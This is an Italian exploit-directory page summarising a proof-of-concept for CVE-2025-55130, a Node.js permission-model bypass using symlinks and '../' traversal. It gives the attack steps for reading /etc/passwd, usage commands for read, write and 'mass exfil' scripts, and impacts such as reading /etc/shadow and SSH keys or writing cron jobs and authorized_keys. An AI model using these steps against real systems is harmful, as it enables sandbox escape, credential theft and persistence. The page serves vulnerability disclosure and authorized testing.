Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55130 — POC per CVE-2025-55130 | Kitploit
Strumenti/GitHubGitHub/scumfrog/cve-2025-55130
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitEsfiltrazione DatiSicurezza WebEscape dal Container
GitHubscumfrog/cve-2025-55130

CVE-2025-55130

POC per CVE-2025-55130

Vedi Repository
16 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55130 - Evasione del Permission Model di Node.js tramite Symlink

root@kitploit:~
   ___ _   _ ___     ____   ___ ____  ____      ____ ____ _ _____ ___  
  / __| | | | __|___/ _  \ / _ \___ \| ___|    | ___| ___/ |___ // _ \ 
 | (__| |_| | _|___| |_| || | | |__) |___ \ _____|__ \___ \ | |_ | | | |
  \___|\___/|___|   \__  ||_| |_|___/|_____|_____|__) |__) || |__) |_| |
                    |___/                       |____/____/|_|____/\___/ 
                                                                        
        Bypass del Permission Model di Node.js tramite symlink appositamente costruiti
                   [ Scoperto da natann @ JFrog ]

Panoramica

Una falla di path traversal in Node.js consente di aggirare le restrizioni di autorizzazione di --allow-fs-read e --allow-fs-write utilizzando symlink che puntano a percorsi assoluti combinati con traversal relativo.

Il controllo delle autorizzazioni e la risoluzione dei percorsi avvengono separatamente. Una volta che il percorso iniziale supera il controllo delle autorizzazioni, il symlink viene seguito e le sequenze di traversal fuoriescono dalla sandbox.

Versioni Interessate

Branch

Analisi Tecnica

Causa Principale

root@kitploit:~
Permission Check:  ./nested/dirs/symlink/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^ ALLOWED (starts with ./)
                   
Path Resolution:   /actual/path/to/script/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
                   Resolves to /etc/passwd - OUTSIDE SANDBOX

Il modello di autorizzazioni valida la stringa del percorso prima della risoluzione del symlink. Creando un symlink verso un percorso assoluto e utilizzando la traversal ../ DOPO il symlink, si esce dalla directory consentita.

Flusso dell'Attacco

root@kitploit:~
1. mkdir -p ./a/b/c/d/e/f/g           # Create nested dirs in allowed path
2. ln -s $(pwd) ./a/b/c/d/e/f/g/x     # Symlink to absolute path  
3. read ./a/b/c/d/e/f/g/x/../../../etc/passwd
         ^^^^^^^^^^^^^^^^^ 
         Permission check passes (inside ./)
         
   After symlink resolution:
   /home/user/project/../../../etc/passwd -> /etc/passwd
   ^^^^^^^^^^^^^^^^^^^^
   Traversal escapes to root

File

FileScopo
exploit.jsExploit principale - legge file arbitrari
exploit_write.jsScrive file arbitrari

Utilizzo

root@kitploit:~
# Basic exploitation
node --permission --allow-fs-read=. --allow-fs-write=. exploit.js

# Check if vulnerable
node check.js

# Mass exfil
node --permission --allow-fs-read=. --allow-fs-write=. exfil.js

Impatto

  • Leggere file sensibili: /etc/passwd, /etc/shadow, chiavi SSH, configurazioni
  • Scrivere file arbitrari: cron job, authorized_keys, configurazioni
  • Evasione del container in ambienti multi-tenant
  • Bypass della sandbox per l'esecuzione di codice non fidato

Riferimenti

  • https://research.jfrog.com/vulnerabilities/nodejs-fs-permissions-bypass-cve-2025-55130/
  • https://nodejs.org/en/blog/vulnerability/december-2025-security-releases
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55130

Crediti

  • Vulnerabilità: Natan Nehorai (natann) @ JFrog Security Research
  • Correzione: RafaelGSS @ Node.js

Solo per ricerca e test autorizzati.

Scarica lo strumento
Vulnerabile
Patchata
20.x< 20.20.020.20.0
22.x< 22.22.022.22.0
24.x< 24.13.024.13.0
25.x< 25.3.025.3.0
exfil.jsEsfiltrazione massiva di file
check.jsVerifica della vulnerabilità di versione